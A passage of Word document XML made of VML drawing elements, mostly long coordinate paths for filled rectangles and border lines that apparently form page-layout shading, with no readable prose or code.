,1517,4089,1517,4103,1517,4118,1517,4133,1517,4149,1517,4164,1517,4180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1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6,1510,4485,1510,4474,1510,4463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1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1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2,10484,5030,10484,5038,10484,5045,10484,5053,10484,5062,10484,5070,10484,5079,10484,5087,10484,5096,10484,5106,10484,5115,10484,5125,10484,5134,10484,5144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5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1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2,1517,5030,1517,5038,1517,5045,1517,5053,1517,5062,1517,5070,1517,5079,1517,5087,1517,5096,1517,5106,1517,5115,1517,5125,1517,5134,1517,5144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2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100,1510,6099,1510,6099,1510,6098,1510,6098,1510,6097,1510,6096,1510,6095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1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2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32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6090" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:6090;width:8990;height:650" coordorigin="1490,6090" coordsize="8990,65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3,10484,6103,10484,6103,10484,6103,10484,6103,10484,6104,10484,6104,10484,6104,10484,6105,10484,6105,10484,6106,10484,6106,10484,6107,10484,6107,10484,6108,10484,6109,10484,6110,10484,6110,10484,6111,10484,6112,10484,6113,10484,6115,10484,6116,10484,6117,10484,6118,10484,6120,10484,6121,10484,6123,10484,6125,10484,6127,10484,6128,10484,6130,10484,6133,10484,6135,10484,6137,10484,6139,10484,6142,10484,6144,10484,6147,10484,6150,10484,6153,10484,6156,10484,6159,10484,6162,10484,6166,10484,6169,10484,6173,10484,6177,10484,6181,10484,6185,10484,6189,10484,6193,10484,6198,10484,6202,10484,6207,10484,6212,10484,6217,10484,6222,10484,6228,10484,6233,10484,6239,10484,6245,10484,6251,10484,6257,10484,6264,10484,6270,10484,6277,10484,6284,10484,6291,10484,6298,10484,6306,10484,6313,10484,6321,10484,6329,10484,6337,10484,6346,10484,6354,10484,6363,10484,6372,10484,6381,10484,6391,10484,6400,10484,6410,10484,6420,10484,6430,10484,6441,10484,6452,10484,6462,10484,6474,10484,6485,10484,6497,10484,6508,10484,6521,10484,6533,10484,6545,10484,6558,10484,6571,10484,6584,10484,6598,10484,6612,10484,6626,10484,6640,10484,6655,10484,6669,10484,6684,10484,6700,10484,6715,10484,6731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6,1510,6746,1510,6746,1510,6746,1510,6745,1510,6745,1510,6744,1510,6744,1510,6743,1510,6743,1510,6742,1510,6741,1510,6741,1510,6740,1510,6739,1510,6738,1510,6737,1510,6736,1510,6735,1510,6734,1510,6732,1510,6731,1510,6730,1510,6728,1510,6726,1510,6725,1510,6723,1510,6721,1510,6719,1510,6717,1510,6715,1510,6713,1510,6710,1510,6708,1510,6705,1510,6702,1510,6700,1510,6697,1510,6694,1510,6690,1510,6687,1510,6684,1510,6680,1510,6676,1510,6673,1510,6669,1510,6665,1510,6660,1510,6656,1510,6652,1510,6647,1510,6642,1510,6637,1510,6632,1510,6627,1510,6622,1510,6616,1510,6610,1510,6604,1510,6598,1510,6592,1510,6586,1510,6579,1510,6573,1510,6566,1510,6559,1510,6551,1510,6544,1510,6536,1510,6528,1510,6520,1510,6512,1510,6504,1510,6495,1510,6486,1510,6477,1510,6468,1510,6459,1510,6449,1510,6439,1510,6429,1510,6419,1510,6409,1510,6398,1510,6387,1510,6376,1510,6364,1510,6353,1510,6341,1510,6329,1510,6317,1510,6304,1510,6291,1510,6278,1510,6265,1510,6251,1510,6238,1510,6224,1510,6209,1510,6195,1510,6180,1510,6165,1510,6150,1510,6134,1510,6118,1510,6102e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:304.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6090" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:6090;width:30;height:650" coordorigin="1490,6090" coordsize="30,650" path="m1517,6102l1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6103,1517,6103,1517,6103,1517,6103,1517,6103,1517,6104,1517,6104,1517,6104,1517,6105,1517,6105,1517,6106,1517,6106,1517,6107,1517,6107,1517,6108,1517,6109,1517,6110,1517,6110,1517,6111,1517,6112,1517,6113,1517,6115,1517,6116,1517,6117,1517,6118,1517,6120,1517,6121,1517,6123,1517,6125,1517,6127,1517,6128,1517,6130,1517,6133,1517,6135,1517,6137,1517,6139,1517,6142,1517,6144,1517,6147,1517,6150,1517,6153,1517,6156,1517,6159,1517,6162,1517,6166,1517,6169,1517,6173,1517,6177,1517,6181,1517,6185,1517,6189,1517,6193,1517,6198,1517,6202,1517,6207,1517,6212,1517,6217,1517,6222,1517,6228,1517,6233,1517,6239,1517,6245,1517,6251,1517,6257,1517,6264,1517,6270,1517,6277,1517,6284,1517,6291,1517,6298,1517,6306,1517,6313,1517,6321,1517,6329,1517,6337,1517,6346,1517,6354,1517,6363,1517,6372,1517,6381,1517,6391,1517,6400,1517,6410,1517,6420,1517,6430,1517,6441,1517,6452,1517,6462,1517,6474,1517,6485,1517,6497,1517,6508,1517,6521,1517,6533,1517,6545,1517,6558,1517,6571,1517,6584,1517,6598,1517,6612,1517,6626,1517,6640,1517,6655,1517,6669,1517,6684,1517,6700,1517,6715,1517,6731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17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6730" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:6730;width:8990;height:350" coordorigin="1490,6730" coordsize="8990,35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7,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6749,10484,6749,10484,6749,10484,6749,10484,6750,10484,6750,10484,6750,10484,6751,10484,6751,10484,6751,10484,6752,10484,6752,10484,6753,10484,6753,10484,6754,10484,6755,10484,6755,10484,6756,10484,6757,10484,6758,10484,6759,10484,6760,10484,6761,10484,6762,10484,6763,10484,6764,10484,6765,10484,6766,10484,6767,10484,6769,10484,6770,10484,6771,10484,6773,10484,6775,10484,6776,10484,6778,10484,6780,10484,6781,10484,6783,10484,6785,10484,6787,10484,6789,10484,6792,10484,6794,10484,6796,10484,6799,10484,6801,10484,6804,10484,6806,10484,6809,10484,6812,10484,6815,10484,6818,10484,6821,10484,6824,10484,6827,10484,6830,10484,6834,10484,6837,10484,6841,10484,6845,10484,6848,10484,6852,10484,6856,10484,6860,10484,6865,10484,6869,10484,6873,10484,6878,10484,6882,10484,6887,10484,6892,10484,6897,10484,6902,10484,6907,10484,6912,10484,6918,10484,6923,10484,6929,10484,6934,10484,6940,10484,6946,10484,6952,10484,6958,10484,6965,10484,6971,10484,6978,10484,6985,10484,6991,10484,6998,10484,7005,10484,7013,10484,7020,10484,7028,10484,7035,10484,7043,10484,7051,10484,7059,10484,7067,10484,7075,10484,7084,10484,7093,10484,7093,10484,7093,10484,7093,10484,7093,10484,7093,10484,7093,10483,7093,10482,7093,10482,7093,10480,7093,10479,7093,10477,7093,10475,7093,10473,7093,10470,7093,10466,7093,10462,7093,10458,7093,10453,7093,10448,7093,10442,7093,10435,7093,10428,7093,10419,7093,10411,7093,10401,7093,10391,7093,10379,7093,10367,7093,10354,7093,10340,7093,10326,7093,10310,7093,10293,7093,10275,7093,10256,7093,10236,7093,10215,7093,10192,7093,10168,7093,10143,7093,10117,7093,10090,7093,10061,7093,10031,7093,9999,7093,9966,7093,9931,7093,9895,7093,9858,7093,9819,7093,9778,7093,9735,7093,9691,7093,9646,7093,9598,7093,9549,7093,9498,7093,9445,7093,9391,7093,9334,7093,9275,7093,9215,7093,9153,7093,9088,7093,9022,7093,8953,7093,8883,7093,8810,7093,8735,7093,8658,7093,8578,7093,8497,7093,8413,7093,8326,7093,8238,7093,8146,7093,8053,7093,7957,7093,7859,7093,7758,7093,7654,7093,7548,7093,7439,7093,7328,7093,7214,7093,7097,7093,6977,7093,6855,7093,6730,7093,6602,7093,6471,7093,6337,7093,6201,7093,6061,7093,5918,7093,5773,7093,5624,7093,5472,7093,5317,7093,5159,7093,4997,7093,4833,7093,4665,7093,4494,7093,4319,7093,4141,7093,3960,7093,3776,7093,3587,7093,3396,7093,3201,7093,3002,7093,2800,7093,2594,7093,2385,7093,2172,7093,1955,7093,1734,7093,1510,7093,1510,7093,1510,7093,1510,7093,1510,7093,1510,7093,1510,7093,1510,7093,1510,7093,1510,7092,1510,7092,1510,7092,1510,7092,1510,7092,1510,7092,1510,7092,1510,7092,1510,7092,1510,7092,1510,7091,1510,7091,1510,7091,1510,7091,1510,7090,1510,7090,1510,7090,1510,7089,1510,7089,1510,7089,1510,7088,1510,7088,1510,7087,1510,7086,1510,7086,1510,7085,1510,7085,1510,7084,1510,7083,1510,7082,1510,7081,1510,7080,1510,7079,1510,7078,1510,7077,1510,7076,1510,7075,1510,7074,1510,7073,1510,7071,1510,7070,1510,7068,1510,7067,1510,7065,1510,7064,1510,7062,1510,7060,1510,7058,1510,7057,1510,7055,1510,7053,1510,7051,1510,7048,1510,7046,1510,7044,1510,7041,1510,7039,1510,7036,1510,7034,1510,7031,1510,7028,1510,7025,1510,7022,1510,7019,1510,7016,1510,7013,1510,7010,1510,7006,1510,7003,1510,6999,1510,6995,1510,6992,1510,6988,1510,6984,1510,6980,1510,6975,1510,6971,1510,6967,1510,6962,1510,6958,1510,6953,1510,6948,1510,6943,1510,6938,1510,6933,1510,6928,1510,6922,1510,6917,1510,6911,1510,6906,1510,6900,1510,6894,1510,6888,1510,6882,1510,6875,1510,6869,1510,6862,1510,6855,1510,6849,1510,6842,1510,6835,1510,6827,1510,6820,1510,6812,1510,6805,1510,6797,1510,6789,1510,6781,1510,6773,1510,6765,1510,6756,1510,6747e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:353.500pt;width:449.500pt;height:1.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7070" coordsize="8990,30">
        <v:shape style="position:absolute;left:1490;top:7070;width:8990;height:30" coordorigin="1490,7070" coordsize="8990,30" path="m1510,7085l1510,7085,1510,7085,1510,7085,1510,7085,1510,7085,1510,7085,1511,7085,1512,7085,1512,7085,1514,7085,1515,7085,1517,7085,1519,7085,1521,7085,1524,7085,1528,7085,1532,7085,1536,7085,1541,7085,1546,7085,1552,7085,1559,7085,1566,7085,1575,7085,1583,7085,1593,7085,1603,7085,1615,7085,1627,7085,1640,7085,1654,7085,1668,7085,1684,7085,1701,7085,1719,7085,1738,7085,1758,7085,1780,7085,1802,7085,1826,7085,1851,7085,1877,7085,1904,7085,1933,7085,1963,7085,1995,7085,2028,7085,2063,7085,2099,7085,2136,7085,2175,7085,2216,7085,2259,7085,2303,7085,2348,7085,2396,7085,2445,7085,2496,7085,2549,7085,2604,7085,2660,7085,2719,7085,2779,7085,2841,7085,2906,7085,2972,7085,3041,7085,3112,7085,3184,7085,3259,7085,3336,7085,3416,7085,3498,7085,3582,7085,3668,7085,3757,7085,3848,7085,3941,7085,4037,7085,4136,7085,4236,7085,4340,7085,4446,7085,4555,7085,4666,7085,4780,7085,4897,7085,5017,7085,5139,7085,5264,7085,5392,7085,5523,7085,5657,7085,5793,7085,5933,7085,6076,7085,6222,7085,6370,7085,6522,7085,6677,7085,6835,7085,6997,7085,7161,7085,7329,7085,7500,7085,7675,7085,7853,7085,8034,7085,8219,7085,8407,7085,8598,7085,8793,7085,8992,7085,9194,7085,9400,7085,9609,7085,9823,7085,10039,7085,10260,7085,10484,7085e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:336.600pt;width:445.800pt;height:18.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:1030;width:130;height:270" coordorigin="2650,1030" coordsize="130,270" path="m2665,1045l2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2667,1045,2667,1045,2667,1045,2667,1045,2667,1045,2667,1045,2668,1045,2668,1045,2668,1045,2668,1045,2669,1045,2669,1045,2669,1045,2670,1045,2670,1045,2670,1045,2671,1045,2671,1045,2671,1045,2672,1045,2672,1045,2673,1045,2673,1045,2674,1045,2674,1045,2675,1045,2675,1045,2676,1045,2677,1045,2677,1045,2678,1045,2679,1045,2679,1045,2680,1045,2681,1045,2682,1045,2682,1045,2683,1045,2684,1045,2685,1045,2686,1045,2687,1045,2688,1045,2689,1045,2690,1045,2691,1045,2692,1045,2693,1045,2694,1045,2695,1045,2697,1045,2698,1045,2699,1045,2700,1045,2702,1045,2703,1045,2705,1045,2706,1045,2708,1045,2709,1045,2711,1045,2712,1045,2714,1045,2716,1045,2717,1045,2719,1045,2721,1045,2723,1045,2725,1045,2726,1045,2728,1045,2730,1045,2732,1045,2734,1045,2737,1045,2739,1045,2741,1045,2743,1045,2745,1045,2748,1045,2750,1045,2753,1045,2755,1045,2758,1045,2760,1045,2763,1045,2765,1045,2768,1045,2771,1045,2774,1045,2777,1045,2779,1045,2782,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1046,2785,1046,2785,1046,2785,1046,2785,1046,2785,1047,2785,1047,2785,1047,2785,1048,2785,1048,2785,1048,2785,1049,2785,1049,2785,1049,2785,1050,2785,1050,2785,1051,2785,1052,2785,1052,2785,1053,2785,1054,2785,1054,2785,1055,2785,1056,2785,1057,2785,1057,2785,1058,2785,1059,2785,1060,2785,1061,2785,1062,2785,1063,2785,1065,2785,1066,2785,1067,2785,1068,2785,1070,2785,1071,2785,1073,2785,1074,2785,1076,2785,1077,2785,1079,2785,1081,2785,1082,2785,1084,2785,1086,2785,1088,2785,1090,2785,1092,2785,1094,2785,1096,2785,1099,2785,1101,2785,1103,2785,1106,2785,1108,2785,1111,2785,1114,2785,1116,2785,1119,2785,1122,2785,1125,2785,1128,2785,1131,2785,1134,2785,1138,2785,1141,2785,1144,2785,1148,2785,1151,2785,1155,2785,1159,2785,1162,2785,1166,2785,1170,2785,1174,2785,1178,2785,1183,2785,1187,2785,1191,2785,1196,2785,1201,2785,1205,2785,1210,2785,1215,2785,1220,2785,1225,2785,1230,2785,1235,2785,1241,2785,1246,2785,1252,2785,1257,2785,1263,2785,1269,2785,1275,2785,1281,2785,1287,2785,1293,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2784,1300,2784,1300,2784,1300,2784,1300,2784,1300,2784,1300,2783,1300,2783,1300,2783,1300,2783,1300,2783,1300,2782,1300,2782,1300,2782,1300,2781,1300,2781,1300,2781,1300,2780,1300,2780,1300,2780,1300,2779,1300,2779,1300,2778,1300,2778,1300,2778,1300,2777,1300,2776,1300,2776,1300,2775,1300,2775,1300,2774,1300,2774,1300,2773,1300,2772,1300,2772,1300,2771,1300,2770,1300,2769,1300,2768,1300,2768,1300,2767,1300,2766,1300,2765,1300,2764,1300,2763,1300,2762,1300,2761,1300,2760,1300,2759,1300,2758,1300,2757,1300,2755,1300,2754,1300,2753,1300,2752,1300,2750,1300,2749,1300,2748,1300,2746,1300,2745,1300,2743,1300,2742,1300,2740,1300,2738,1300,2737,1300,2735,1300,2733,1300,2732,1300,2730,1300,2728,1300,2726,1300,2724,1300,2722,1300,2720,1300,2718,1300,2716,1300,2714,1300,2712,1300,2710,1300,2708,1300,2705,1300,2703,1300,2701,1300,2698,1300,2696,1300,2693,1300,2691,1300,2688,1300,2685,1300,2683,1300,2680,1300,2677,1300,2674,1300,2671,1300,2668,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1300,2665,1299,2665,1299,2665,1299,2665,1299,2665,1299,2665,1299,2665,1299,2665,1299,2665,1299,2665,1298,2665,1298,2665,1298,2665,1298,2665,1298,2665,1297,2665,1297,2665,1297,2665,1296,2665,1296,2665,1296,2665,1295,2665,1295,2665,1294,2665,1294,2665,1293,2665,1293,2665,1292,2665,1291,2665,1291,2665,1290,2665,1289,2665,1288,2665,1288,2665,1287,2665,1286,2665,1285,2665,1284,2665,1283,2665,1282,2665,1281,2665,1280,2665,1278,2665,1277,2665,1276,2665,1274,2665,1273,2665,1272,2665,1270,2665,1269,2665,1267,2665,1265,2665,1264,2665,1262,2665,1260,2665,1258,2665,1256,2665,1254,2665,1252,2665,1250,2665,1248,2665,1245,2665,1243,2665,1241,2665,1238,2665,1236,2665,1233,2665,1231,2665,1228,2665,1225,2665,1222,2665,1219,2665,1216,2665,1213,2665,1210,2665,1207,2665,1203,2665,1200,2665,1196,2665,1193,2665,1189,2665,1186,2665,1182,2665,1178,2665,1174,2665,1170,2665,1166,2665,1161,2665,1157,2665,1153,2665,1148,2665,1144,2665,1139,2665,1134,2665,1129,2665,1124,2665,1119,2665,1114,2665,1109,2665,1104,2665,1098,2665,1093,2665,1087,2665,1081,2665,1075,2665,1069,2665,1063,2665,1057,2665,1051,2665,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:1030;width:130;height:270" coordorigin="3010,1030" coordsize="130,270" path="m3026,1045l3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3027,1045,3027,1045,3027,1045,3027,1045,3027,1045,3027,1045,3027,1045,3028,1045,3028,1045,3028,1045,3028,1045,3029,1045,3029,1045,3029,1045,3029,1045,3030,1045,3030,1045,3030,1045,3031,1045,3031,1045,3032,1045,3032,1045,3032,1045,3033,1045,3033,1045,3034,1045,3034,1045,3035,1045,3036,1045,3036,1045,3037,1045,3037,1045,3038,1045,3039,1045,3039,1045,3040,1045,3041,1045,3042,1045,3043,1045,3043,1045,3044,1045,3045,1045,3046,1045,3047,1045,3048,1045,3049,1045,3050,1045,3051,1045,3052,1045,3053,1045,3054,1045,3056,1045,3057,1045,3058,1045,3059,1045,3061,1045,3062,1045,3063,1045,3065,1045,3066,1045,3068,1045,3069,1045,3071,1045,3072,1045,3074,1045,3076,1045,3077,1045,3079,1045,3081,1045,3083,1045,3085,1045,3087,1045,3089,1045,3091,1045,3093,1045,3095,1045,3097,1045,3099,1045,3101,1045,3103,1045,3106,1045,3108,1045,3110,1045,3113,1045,3115,1045,3118,1045,3120,1045,3123,1045,3126,1045,3128,1045,3131,1045,3134,1045,3137,1045,3140,1045,3143,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1045,3146,1046,3146,1046,3146,1046,3146,1046,3146,1046,3146,1047,3146,1047,3146,1047,3146,1048,3146,1048,3146,1048,3146,1049,3146,1049,3146,1049,3146,1050,3146,1050,3146,1051,3146,1052,3146,1052,3146,1053,3146,1054,3146,1054,3146,1055,3146,1056,3146,1057,3146,1057,3146,1058,3146,1059,3146,1060,3146,1061,3146,1062,3146,1063,3146,1065,3146,1066,3146,1067,3146,1068,3146,1070,3146,1071,3146,1073,3146,1074,3146,1076,3146,1077,3146,1079,3146,1081,3146,1082,3146,1084,3146,1086,3146,1088,3146,1090,3146,1092,3146,1094,3146,1096,3146,1099,3146,1101,3146,1103,3146,1106,3146,1108,3146,1111,3146,1114,3146,1116,3146,1119,3146,1122,3146,1125,3146,1128,3146,1131,3146,1134,3146,1138,3146,1141,3146,1144,3146,1148,3146,1151,3146,1155,3146,1159,3146,1162,3146,1166,3146,1170,3146,1174,3146,1178,3146,1183,3146,1187,3146,1191,3146,1196,3146,1201,3146,1205,3146,1210,3146,1215,3146,1220,3146,1225,3146,1230,3146,1235,3146,1241,3146,1246,3146,1252,3146,1257,3146,1263,3146,1269,3146,1275,3146,1281,3146,1287,3146,1293,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3146,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3145,1300,3144,1300,3144,1300,3144,1300,3144,1300,3144,1300,3144,1300,3143,1300,3143,1300,3143,1300,3143,1300,3143,1300,3142,1300,3142,1300,3142,1300,3141,1300,3141,1300,3141,1300,3140,1300,3140,1300,3140,1300,3139,1300,3139,1300,3138,1300,3138,1300,3137,1300,3137,1300,3136,1300,3136,1300,3135,1300,3134,1300,3134,1300,3133,1300,3132,1300,3132,1300,3131,1300,3130,1300,3129,1300,3129,1300,3128,1300,3127,1300,3126,1300,3125,1300,3124,1300,3123,1300,3122,1300,3121,1300,3120,1300,3119,1300,3118,1300,3117,1300,3116,1300,3114,1300,3113,1300,3112,1300,3110,1300,3109,1300,3108,1300,3106,1300,3105,1300,3103,1300,3102,1300,3100,1300,3099,1300,3097,1300,3095,1300,3094,1300,3092,1300,3090,1300,3088,1300,3086,1300,3084,1300,3083,1300,3081,1300,3079,1300,3076,1300,3074,1300,3072,1300,3070,1300,3068,1300,3065,1300,3063,1300,3061,1300,3058,1300,3056,1300,3053,1300,3051,1300,3048,1300,3045,1300,3043,1300,3040,1300,3037,1300,3034,1300,3031,1300,3029,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1298,3026,1298,3026,1298,3026,1298,3026,1298,3026,1297,3026,1297,3026,1297,3026,1296,3026,1296,3026,1296,3026,1295,3026,1295,3026,1294,3026,1294,3026,1293,3026,1293,3026,1292,3026,1291,3026,1291,3026,1290,3026,1289,3026,1288,3026,1288,3026,1287,3026,1286,3026,1285,3026,1284,3026,1283,3026,1282,3026,1281,3026,1280,3026,1278,3026,1277,3026,1276,3026,1274,3026,1273,3026,1272,3026,1270,3026,1269,3026,1267,3026,1265,3026,1264,3026,1262,3026,1260,3026,1258,3026,1256,3026,1254,3026,1252,3026,1250,3026,1248,3026,1245,3026,1243,3026,1241,3026,1238,3026,1236,3026,1233,3026,1231,3026,1228,3026,1225,3026,1222,3026,1219,3026,1216,3026,1213,3026,1210,3026,1207,3026,1203,3026,1200,3026,1196,3026,1193,3026,1189,3026,1186,3026,1182,3026,1178,3026,1174,3026,1170,3026,1166,3026,1161,3026,1157,3026,1153,3026,1148,3026,1144,3026,1139,3026,1134,3026,1129,3026,1124,3026,1119,3026,1114,3026,1109,3026,1104,3026,1098,3026,1093,3026,1087,3026,1081,3026,1075,3026,1069,3026,1063,3026,1057,3026,1051,3026,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:312.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6250,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:6250;top:1030;width:130;height:270" coordorigin="6250,1030" coordsize="130,270" path="m6267,1045l6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6268,1045,6268,1045,6268,1045,6268,1045,6268,1045,6268,1045,6268,1045,6268,1045,6268,1045,6268,1045,6269,1045,6269,1045,6269,1045,6269,1045,6269,1045,6269,1045,6270,1045,6270,1045,6270,1045,6270,1045,6271,1045,6271,1045,6271,1045,6272,1045,6272,1045,6272,1045,6273,1045,6273,1045,6274,1045,6274,1045,6275,1045,6275,1045,6276,1045,6276,1045,6277,1045,6277,1045,6278,1045,6278,1045,6279,1045,6280,1045,6280,1045,6281,1045,6282,1045,6283,1045,6283,1045,6284,1045,6285,1045,6286,1045,6287,1045,6288,1045,6289,1045,6290,1045,6291,1045,6292,1045,6293,1045,6294,1045,6295,1045,6296,1045,6297,1045,6298,1045,6300,1045,6301,1045,6302,1045,6304,1045,6305,1045,6306,1045,6308,1045,6309,1045,6311,1045,6312,1045,6314,1045,6316,1045,6317,1045,6319,1045,6321,1045,6323,1045,6324,1045,6326,1045,6328,1045,6330,1045,6332,1045,6334,1045,6336,1045,6338,1045,6341,1045,6343,1045,6345,1045,6347,1045,6350,1045,6352,1045,6354,1045,6357,1045,6359,1045,6362,1045,6365,1045,6367,1045,6370,1045,6373,1045,6376,1045,6378,1045,6381,1045,6384,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1045,6387,1046,6387,1046,6387,1046,6387,1046,6387,1046,6387,1047,6387,1047,6387,1047,6387,1048,6387,1048,6387,1048,6387,1049,6387,1049,6387,1049,6387,1050,6387,1050,6387,1051,6387,1052,6387,1052,6387,1053,6387,1054,6387,1054,6387,1055,6387,1056,6387,1057,6387,1057,6387,1058,6387,1059,6387,1060,6387,1061,6387,1062,6387,1063,6387,1065,6387,1066,6387,1067,6387,1068,6387,1070,6387,1071,6387,1073,6387,1074,6387,1076,6387,1077,6387,1079,6387,1081,6387,1082,6387,1084,6387,1086,6387,1088,6387,1090,6387,1092,6387,1094,6387,1096,6387,1099,6387,1101,6387,1103,6387,1106,6387,1108,6387,1111,6387,1114,6387,1116,6387,1119,6387,1122,6387,1125,6387,1128,6387,1131,6387,1134,6387,1138,6387,1141,6387,1144,6387,1148,6387,1151,6387,1155,6387,1159,6387,1162,6387,1166,6387,1170,6387,1174,6387,1178,6387,1183,6387,1187,6387,1191,6387,1196,6387,1201,6387,1205,6387,1210,6387,1215,6387,1220,6387,1225,6387,1230,6387,1235,6387,1241,6387,1246,6387,1252,6387,1257,6387,1263,6387,1269,6387,1275,6387,1281,6387,1287,6387,1293,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6387,1300,6386,1300,6386,1300,6386,1300,6386,1300,6386,1300,6386,1300,6386,1300,6385,1300,6385,1300,6385,1300,6385,1300,6385,1300,6384,1300,6384,1300,6384,1300,6384,1300,6383,1300,6383,1300,6383,1300,6382,1300,6382,1300,6382,1300,6381,1300,6381,1300,6380,1300,6380,1300,6379,1300,6379,1300,6378,1300,6378,1300,6377,1300,6377,1300,6376,1300,6375,1300,6375,1300,6374,1300,6373,1300,6373,1300,6372,1300,6371,1300,6370,1300,6369,1300,6369,1300,6368,1300,6367,1300,6366,1300,6365,1300,6364,1300,6363,1300,6362,1300,6361,1300,6360,1300,6358,1300,6357,1300,6356,1300,6355,1300,6353,1300,6352,1300,6351,1300,6349,1300,6348,1300,6346,1300,6345,1300,6343,1300,6342,1300,6340,1300,6339,1300,6337,1300,6335,1300,6334,1300,6332,1300,6330,1300,6328,1300,6326,1300,6324,1300,6322,1300,6320,1300,6318,1300,6316,1300,6314,1300,6312,1300,6309,1300,6307,1300,6305,1300,6302,1300,6300,1300,6297,1300,6295,1300,6292,1300,6290,1300,6287,1300,6284,1300,6282,1300,6279,1300,6276,1300,6273,1300,6270,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1299,6267,1299,6267,1299,6267,1299,6267,1299,6267,1299,6267,1299,6267,1299,6267,1299,6267,1298,6267,1298,6267,1298,6267,1298,6267,1298,6267,1297,6267,1297,6267,1297,6267,1296,6267,1296,6267,1296,6267,1295,6267,1295,6267,1294,6267,1294,6267,1293,6267,1293,6267,1292,6267,1291,6267,1291,6267,1290,6267,1289,6267,1288,6267,1288,6267,1287,6267,1286,6267,1285,6267,1284,6267,1283,6267,1282,6267,1281,6267,1280,6267,1278,6267,1277,6267,1276,6267,1274,6267,1273,6267,1272,6267,1270,6267,126